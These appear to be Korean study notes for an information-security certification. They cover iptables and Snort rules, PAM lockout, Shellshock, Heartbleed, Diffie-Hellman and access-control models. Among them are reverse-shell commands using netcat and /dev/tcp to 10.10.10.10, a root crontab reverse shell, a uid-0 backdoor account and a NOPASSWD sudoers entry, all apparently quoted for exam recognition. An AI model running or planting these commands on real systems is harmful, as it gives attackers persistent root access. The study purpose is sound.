- monlist
- /etc/ntp.conf 설정
disable monitor설정 추가
- monlist 사용 여부 확인
ntpdc -c monlist 192.168.0.1
- iptables reject
- Snort 룰 예시 (외부로 유출되는 정보 알림)
alert tcp 192.168.1.0/24 any -> any any (content: !"데이터")
- Snort 룰 예시 (Telnet 감지)
alert tcp any any -> any 23 (msg: "TELNET"; content: "anonymous"; offset:0; depth:3;)
- iptables 룰 (2초 동안 30번 요청 차단)
iptables -A INPUT -p tcp --dport 80 -m recent --name hi --update --seconds 2 --hitcount 30 -j DROP
- iptables 룰 (새 연결에 대해 2초 동안 30번 요청 차단)
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --name hi --update --seconds 2 --hitcount 30 -j DROP
- iptables 룰 (동일 출발지에서 5개 연결 초과 시 차단)
iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 5 -j DROP
- iptables 룰 (최초 연결의 동시 연결이 5 초과인 경우 차단)
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m connlimit --connlimit-above 5
- 계정 잠금 임계값 설정 (/etc/pam.d/system-auth)
deny=5, unlock_time=120: 120초 후 잠금 해제no_magic_root: 루트 계정은 잠금 안 함reset: 로그인 성공 시 실패 횟수 초기화
- /etc/shadow 권한 설정
chmod 700 /etc/shadow
- crontab을 이용한 리버스 쉘 설정 (/etc/crontab)
* * * * * root /usr/nc 10.10.10.10 80 -e /bin/bash
- systemctl을 이용한 cron 서비스 관리
systemctl stop cron systemctl start cron systemctl restart cron
- service 명령어를 이용한 cron 서비스 관리
service cron stop service cron start service cron restart
- 특정 사용자의 crontab 삭제
crontab -u username -r
- netcat으로 8080 포트 리스닝
nc -lp 8080
- netcat으로 리버스 쉘 연결 (Windows)
nc.exe 192.168.0.1 8080 -e cmd
netcat 옵션 설명:
-e /bin/bash: 연결 성공 시 bash 쉘 실행-l: 리스닝 모드 설정-p 8080: 리스닝할 포트 번호 지정
- root 권한을 가진 사용자 추가
useradd -o -u 0 -g 0 -d /root algisa-o: uid 중복 허용-d /root: 홈 디렉토리를 root로 설정algisa: 사용자명
- 로그인 기록 확인 명령어
last
- 파일 속성 변경 (immutable 해제)
chattr -i file/path
- 프로세스 정보 확인
ls /proc/1234
- 프로세스 명령어 및 인자 확인
cat /proc/1234/cmdline
- sudoers 설정 예시 (/etc/sudoers)
algisa ALL=(ALL) NOPASSWD: ALLALL=(ALL): 모든 호스트에서NOPASSWD: ALL: sudo 사용 시 비밀번호 인증 없이 바로 사용 가능
- sudoers 설정 예시 (모든 권한 부여)
algisa ALL=(ALL) ALL- 형식:
사용자명 IP(사용자명) 허용할_명령어
- 형식:
- 메모리에서 실행 중인 프로세스의 실행 파일 복원
cp /proc/1234/exe /tmp/backdoor
- Shell Shock (쉘쇼크)
- Bash 함수 선언문 끝에 임의의 명령어를 추가로 삽입하여 환경변수에 저장할 경우 삽입한 명령어까지 실행되는 취약점
- 리버스 쉘 명령어 예시
/bin/bash > /dev/tcp/10.10.10.10/8080 0<&1
- Heartbleed 취약점 대응
- 최신 버전으로 TLS 업데이트
- TLS 인증서 재발급
- iptables를 이용한 NTP 응답 제한
iptables -A OUTPUT -p udp --sport 123 -m length --length 100: -j DROP- 100byte 이상 NTP 응답 차단
- Null routing (Blackhole filtering)
- 인증성
- 정보에 접근할 수 있는 자격을 검증하는 성질
- 부인방지 (Non-repudiation)
- 행위를 부인할 수 없는 성질
- 가용성
- 정보에 접근이 필요할 시 언제든지 접근할 수 있는 성질
- 책임추적성 (Accountability)
- 정보에 접근하는 주체가 결과에 대해 책임지도록 추적하는 로깅 서비스
- Diffie-Hellman
- 키 교환, 키 합의 알고리즘
- 최초의 비밀키 교환 알고리즘
- 유한체상의 이산대수문제를 풀기 어렵다는 것에 기초
- https://tramamte.github.io/2018/07/20/diffie-hellman/
- Diffie-Hellman 키 교환 알고리즘 취약점
- 중간자 공격
- 이산대수 공격
- Diffie-Hellman 중간자 공격 대응
- 디지털 서명
- 공개키 인증서
- DAC (Discretionary Access Control)
- 임의적 접근통제
- 사용자의 접근권한을 기반으로 접근통제
- 장점: 유연하고 세분화된 접근통제 가능
- 단점: 일관성 있고 중앙집중적인 접근 통제가 어려움
- MAC (Mandatory Access Control)
- 강제적 접근통제
- 보안 등급, 취급인가, 보안 레이블을 비교하여 접근통제
- 중앙 관리자 또는 보안 관리자에 의해서만 제어
- 엄격한 통제가 요구되는 환경에 주로 사용
- BLP (Bell-LaPadula) 모델
- 강제적 접근통제 기반 모델
- 기밀성 보장을 위한 정보 흐름 통제
- NO READ UP: 주체보다 높은 수준의 객체를 읽을 수 없음
- NO WRITE DOWN: 주체보다 낮은 객체를 쓸 수 없음
- BIBA 모델
- 강제적 접근통제 기반 모델
- 무결성 보장을 위한 모델
- NO READ DOWN: 주체보다 무결성 수준이 낮은 객체의 정보를 읽을 수 없음
- NO WRITE UP: 주체보다 무결성 수준이 높은 객체의 정보를 쓸 수 없음
- Clark-Wilson 모델
- 상업적 운영에서 무결성의 3가지 목표를 보장하기 위한 모델
- Chinese Wall 모델 (만리장성 모델)
- 이해관계가 충돌하는 상황에서 기밀성과 무결성을 보장하기 위해 사용
- RBAC (Role-Based Access Control)
- 주체자에 부여된 역할에 기반한 접근 통제
- 장점:
- 인사 이동이 잦거나 동적으로 변하는 조직에 적합
- 최소 권한 부여가 용이
- 일관성 있는 통제 가능
- 단점: 임의적 접근통제보다 유연성이 떨어짐
- Secure OS (보안 운영체제)
- 보안 모델 정리
- 무결성: BIBA 모델
- 기밀성: BLP 모델
- Shodan (쇼단)
- 인터넷에 연결된 기기의 다양한 정보를 제공하는 검색 엔진
- 서버, 라우터, 스마트 기기, IoT 기기 등 인터넷과 연결된 모든 기기를 검색 가능
